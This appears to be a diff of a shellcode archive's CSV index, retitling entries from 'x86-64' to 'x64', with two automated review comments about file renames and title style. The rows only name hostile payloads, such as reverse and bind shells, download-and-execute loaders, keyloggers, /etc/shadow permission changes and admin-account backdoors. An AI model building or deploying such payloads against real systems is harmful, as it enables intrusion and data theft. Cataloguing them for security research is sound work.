35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35205,shellcodes/linux_x86-64/35205.asm,"Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
35586,shellcodes/linux_x86-64/35586.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
35794,shellcodes/windows_x86-64/35794.txt,"Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35794,shellcodes/windows_x86-64/35794.txt,"Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
36411,shellcodes/generator/36411.txt,"Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
36411,shellcodes/generator/36411.py,"Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
36359,shellcodes/linux_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64
36359,shellcodes/linux_x86-64/36359.c,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64
36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
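Review bot: Several rows in this hunk change the file column, not just the title: 33836.txt becomes 33836.c, 35205.txt becomes 35205.asm, 35519.txt becomes 35519.c and 36411.txt becomes 36411.py. Anything that resolves entries through the file column will break unless the files themselves are moved in the same commit, so please confirm the renames are included and mention them in the commit message, since the description otherwise reads as a title-only cleanup. Note also that 35794 keeps its .txt extension while being retitled, which is fine if intentional but worth a quick check against its sibling 35793.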
@ -494,7 +494,7 @@ id,file,description,date,author,type,platform
36780,shellcodes/windows_x86/36780.c,"Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
36858,shellcodes/linux_x86-64/36858.c,"Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86
37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve(/bin/sh) Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86
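Review bot: Style point on the 36858 row: the new title still reads "execve(/bin/sh) Via Push Shellcode" while the neighbouring 36857 row in the same hunk uses "execve(/bin/sh) + Push Method Shellcode" for the same technique. Since the line is already being touched for the x86-64 to x64 rename, bring it in line with the "+ Feature" convention used by the other titles so both entries match the same search term.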
@ -504,7 +504,7 @@ id,file,description,date,author,type,platform
37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37362,shellcodes/linux_x86-64/37362.c,"Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2015-06-26,"Bill Borskey",shellcode,linux_x86
@ -512,104 +512,104 @@ id,file,description,date,author,type,platform
37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
37401,shellcodes/linux_x86-64/37401.asm,"Linux/x64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator)",2015-07-05,"Artem T",shellcode,linux_x86
37664,shellcodes/windows_x86/37664.c,"Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
37758,shellcodes/windows_x86/37758.c,"Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
37758,shellcodes/windows_x86/37758.c,"Windows/x86 - user32!MessageBox(Hello World!) + Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator)",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86
38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
38126,shellcodes/osx/38126.c,"OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
38150,shellcodes/linux_x86-64/38150.txt,"Linux/x64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
38239,shellcodes/linux_x86-64/38239.asm,"Linux/x64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
38469,shellcodes/linux_x86-64/38469.c,"Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38815,shellcodes/linux_x86-64/38815.c,"Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
39149,shellcodes/linux_x86-64/39149.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39336,shellcodes/linux/39336.c,"Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39338,shellcodes/linux/39338.c,"Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39617,shellcodes/linux_x86-64/39617.c,"Linux/x64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
39624,shellcodes/linux_x86-64/39624.c,"Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39625,shellcodes/linux_x86-64/39625.c,"Linux/x64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39684,shellcodes/linux_x86-64/39684.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39700,shellcodes/linux_x86-64/39700.c,"Linux/x64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
39728,shellcodes/generator/39728.py,"Linux/x64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
39754,shellcodes/windows_x86/39754.txt,"Windows/x86 (.Net Framework) - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39758,shellcodes/linux_x86-64/39758.c,"Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39763,shellcodes/linux_x86-64/39763.c,"Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39847,shellcodes/linux_x86-64/39847.c,"Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
39869,shellcodes/linux_x86-64/39869.c,"Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39979,shellcodes/windows/39979.c,"Windows (XP < 10) - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
40005,shellcodes/windows_x86/40005.c,"Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
40029,shellcodes/linux_x86-64/40029.c,"Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
40061,shellcodes/linux_x86-64/40061.c,"Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
